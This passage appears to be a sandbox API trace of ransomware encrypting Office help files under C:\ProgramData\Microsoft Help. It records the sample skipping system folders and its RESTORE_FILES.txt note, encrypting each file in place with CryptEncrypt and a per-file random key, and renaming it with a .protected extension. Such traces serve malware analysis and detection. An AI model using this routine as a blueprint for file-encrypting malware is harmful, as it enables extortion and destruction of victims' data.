out: lpNewFilePointer=0xffffffff) returned 1 [0072.537] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x15e, lpOverlapped=0x0) returned 1 [0072.537] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.537] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.537] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.537] CloseHandle (hObject=0xa4) returned 1 [0072.537] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.protected") returned 68 [0072.538] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn.protected")) returned 1 [0072.538] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.538] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="Windows") returned -1 [0072.538] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="Program Files") returned -1 [0072.538] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.538] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="$Recycle.bin") returned 1 
[0072.538] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.538] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn") returned 55 [0072.538] StrStrIW (lpFirst="MS.MSTORE.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.538] lstrcmpW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.538] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.538] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.538] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.538] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn") returned 55 [0072.538] StrStrW (lpFirst="MS.MSTORE.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.539] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn") returned 55 [0072.539] StrStrW (lpFirst="MS.MSTORE.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.539] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn") returned 55 [0072.539] StrStrW (lpFirst="MS.MSTORE.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.539] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x14c, lpOverlapped=0x0) returned 1 [0072.540] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffeb4, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.540] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x14c, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x14c, lpOverlapped=0x0) returned 1 [0072.540] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.540] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.540] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.540] CloseHandle (hObject=0xa4) returned 1 [0072.541] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn.protected") returned 65 [0072.541] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn.protected")) returned 1 [0072.541] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.541] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="Windows") returned -1 [0072.541] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="Program Files") returned -1 [0072.541] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.541] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", 
lpString2="$Recycle.bin") returned 1 [0072.541] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.541] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn") returned 52 [0072.541] StrStrIW (lpFirst="MS.OIS.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.541] lstrcmpW (lpString1="MS.OIS.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.541] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.542] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.542] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.542] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn") returned 52 [0072.542] StrStrW (lpFirst="MS.OIS.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.542] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn") returned 52 [0072.542] StrStrW (lpFirst="MS.OIS.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.542] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn") returned 52 [0072.542] StrStrW (lpFirst="MS.OIS.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.542] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x13a, lpOverlapped=0x0) returned 1 [0072.543] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffec6, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.543] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x13a, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x13a, lpOverlapped=0x0) returned 1 [0072.543] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.543] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.543] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.543] CloseHandle (hObject=0xa4) returned 1 [0072.544] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn.protected") returned 62 [0072.544] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn.protected")) returned 1 [0072.544] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.544] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="Windows") returned -1 [0072.544] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="Program Files") returned -1 [0072.544] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.544] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", 
lpString2="$Recycle.bin") returned 1 [0072.544] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.544] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn") returned 56 [0072.544] StrStrIW (lpFirst="MS.ONENOTE.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.544] lstrcmpW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.544] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.544] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.545] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.545] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn") returned 56 [0072.545] StrStrW (lpFirst="MS.ONENOTE.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.545] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn") returned 56 [0072.545] StrStrW (lpFirst="MS.ONENOTE.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.545] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn") returned 56 [0072.545] StrStrW (lpFirst="MS.ONENOTE.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.545] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x152, lpOverlapped=0x0) returned 1 [0072.546] SetFilePointerEx (in: hFile=0xa4, 
liDistanceToMove=0xfffffeae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.546] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x152, lpOverlapped=0x0) returned 1 [0072.546] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.546] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.546] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.546] CloseHandle (hObject=0xa4) returned 1 [0072.547] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.protected") returned 66 [0072.547] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn.protected")) returned 1 [0072.547] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.547] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="Windows") returned -1 [0072.547] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="Program Files") returned -1 [0072.547] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.547] lstrcmpiW 
(lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.547] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.547] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn") returned 56 [0072.547] StrStrIW (lpFirst="MS.OUTLOOK.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.547] lstrcmpW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.547] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.547] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.547] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.563] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn") returned 56 [0072.563] StrStrW (lpFirst="MS.OUTLOOK.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.563] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn") returned 56 [0072.563] StrStrW (lpFirst="MS.OUTLOOK.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.563] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn") returned 56 [0072.563] StrStrW (lpFirst="MS.OUTLOOK.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.564] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x152, lpOverlapped=0x0) returned 1 [0072.564] 
SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffeae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.564] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x152, lpOverlapped=0x0) returned 1 [0072.565] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.565] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.565] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.565] CloseHandle (hObject=0xa4) returned 1 [0072.565] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.protected") returned 66 [0072.565] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn.protected")) returned 1 [0072.566] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.566] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="Windows") returned -1 [0072.566] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="Program Files") returned -1 [0072.566] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="Program Files 
(x86)") returned -1 [0072.566] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.566] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.566] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn") returned 60 [0072.566] StrStrIW (lpFirst="MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.566] lstrcmpW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.566] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.566] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.566] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.566] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn") returned 60 [0072.566] StrStrW (lpFirst="MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.566] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn") returned 60 [0072.566] StrStrW (lpFirst="MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.566] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn") returned 60 [0072.566] StrStrW (lpFirst="MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.567] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: 
lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x16a, lpOverlapped=0x0) returned 1 [0072.567] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffe96, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.567] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x16a, lpOverlapped=0x0) returned 1 [0072.568] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.568] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.568] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.568] CloseHandle (hObject=0xa4) returned 1 [0072.568] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.protected") returned 70 [0072.568] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn.protected")) returned 1 [0072.569] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.569] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="Windows") returned -1 [0072.569] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="Program 
Files") returned -1 [0072.569] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.569] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.569] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.569] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn") returned 57 [0072.569] StrStrIW (lpFirst="MS.POWERPNT.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.569] lstrcmpW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.569] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.569] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.569] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.579] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn") returned 57 [0072.579] StrStrW (lpFirst="MS.POWERPNT.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.579] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn") returned 57 [0072.579] StrStrW (lpFirst="MS.POWERPNT.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.579] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn") returned 57 [0072.579] StrStrW (lpFirst="MS.POWERPNT.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.579] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, 
